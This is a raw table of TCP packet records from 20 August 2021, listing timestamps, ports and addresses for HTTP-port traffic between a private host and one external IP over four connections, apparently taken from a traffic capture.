Aug 20, 2021 17:10:54.174149036 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.174165964 CEST	49731	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.174166918 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.174186945 CEST	49731	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.174191952 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.174212933 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.174230099 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.174247980 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.174264908 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.174280882 CEST	49731	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.174282074 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.174361944 CEST	49731	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.174407959 CEST	49731	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.200046062 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200062990 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200099945 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200115919 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200135946 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200150967 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200149059 CEST	49731	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.200197935 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200261116 CEST	49731	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.200263977 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200320005 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200331926 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200383902 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200609922 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200629950 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200644970 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200659037 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200860977 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200875044 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200881958 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200887918 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200895071 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200917006 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200926065 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.200932980 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201136112 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201155901 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201169968 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201181889 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201189041 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201195955 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201205969 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201215982 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201227903 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201267004 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201277971 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201287031 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201302052 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201325893 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.201339960 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.226639986 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.226664066 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.226672888 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.226680994 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.227813959 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.227894068 CEST	49731	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.530400991 CEST	49731	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.531653881 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.556201935 CEST	80	49731	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.556318045 CEST	49731	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.557450056 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.557640076 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.558459044 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.558753014 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.559252977 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.559520006 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.584228992 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.584382057 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.585165024 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.585232973 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.585269928 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.585299969 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.585304022 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.585328102 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.585340977 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.585342884 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.585372925 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.585386992 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.585398912 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.585400105 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.585439920 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.585458994 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.585490942 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.585506916 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.585520029 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.585541964 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.585602999 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.611407995 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611438990 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611455917 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611476898 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611502886 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611526966 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611543894 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.611552000 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611576080 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611604929 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.611607075 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611645937 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611670017 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611681938 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.611696005 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611702919 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.611788034 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611797094 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.611845016 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.611862898 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611891031 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611963034 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.611970901 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.611987114 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.612005949 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.612061024 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.612099886 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.612132072 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.612149954 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.612224102 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.612296104 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.637474060 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.637507915 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.637523890 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.637538910 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.637586117 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.637609005 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.637696981 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.637705088 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.637777090 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:54.637818098 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.637841940 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.637866020 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.637887955 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.637953997 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.637975931 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.637998104 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638053894 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638077021 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638096094 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638117075 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638137102 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638156891 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638176918 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638197899 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638261080 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638282061 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638302088 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638396025 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638417959 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638438940 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638459921 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638480902 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638537884 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638560057 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638581991 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638602972 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638624907 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638696909 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638772011 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.638793945 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.663548946 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.663574934 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.663858891 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.663897991 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.665316105 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:54.665446997 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.888076067 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.903639078 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.913975954 CEST	80	49732	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.914077044 CEST	49732	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.930083036 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.930344105 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.931026936 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.931212902 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.931443930 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.931543112 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.957741976 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.957768917 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.957786083 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.957798004 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.957811117 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.957825899 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.957838058 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.957978964 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.958024979 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.958345890 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.958359957 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.958373070 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.958385944 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.958400965 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.958442926 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.958466053 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.983828068 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.983901978 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.983922005 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.983947992 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.984014034 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.984046936 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.984194994 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984208107 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984215021 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984221935 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984229088 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984240055 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984246969 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984256029 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984262943 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984323978 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984338999 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984350920 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984361887 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.984416962 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.984436989 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.984635115 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984646082 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984652042 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984743118 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:57.984841108 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:57.984908104 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:58.009835958 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.009861946 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.009882927 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.009902954 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.009923935 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.009943962 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.009973049 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:58.010073900 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:58.010143042 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010163069 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010183096 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010354042 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010375977 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010395050 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010421991 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010437965 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010458946 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010478020 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010498047 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010524035 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010546923 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010566950 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010586977 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010607004 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010624886 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010643959 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010663033 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010677099 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010696888 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010715008 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010734081 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010752916 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010780096 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010802984 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010822058 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010840893 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010860920 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010878086 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010896921 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.010915995 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.035918951 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.035945892 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.035953999 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.036088943 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:58.036108017 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.037519932 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.037728071 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.367753983 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.370074987 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.393784046 CEST	80	49733	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.393862963 CEST	49733	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.395832062 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.395968914 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.407685995 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.407867908 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.408201933 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.408354998 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.434320927 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.434353113 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.434758902 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.434782982 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.434797049 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.434812069 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.434827089 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.434838057 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.434848070 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.434851885 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.434866905 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.434885025 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.434899092 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.434942007 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.434964895 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.434983015 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.435029030 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.462054968 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462126970 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462142944 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462152004 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462165117 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462172985 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462179899 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462188005 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462199926 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462208986 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462220907 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462342978 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462357044 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462373972 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462389946 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462407112 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.462758064 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.462920904 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.465354919 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.465379953 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.465390921 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.465485096 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.492353916 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.492387056 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.492398977 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.492425919 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.492449999 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.492463112 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.492482901 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.492502928 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.492522955 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.492562056 CEST	49734	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:59.492625952 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.492645979 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.492660046 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.492801905 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.492964983 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.492988110 CEST	80	49734	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:59.493078947 CEST	80	49734	109.234.32.63	192.168.2.3
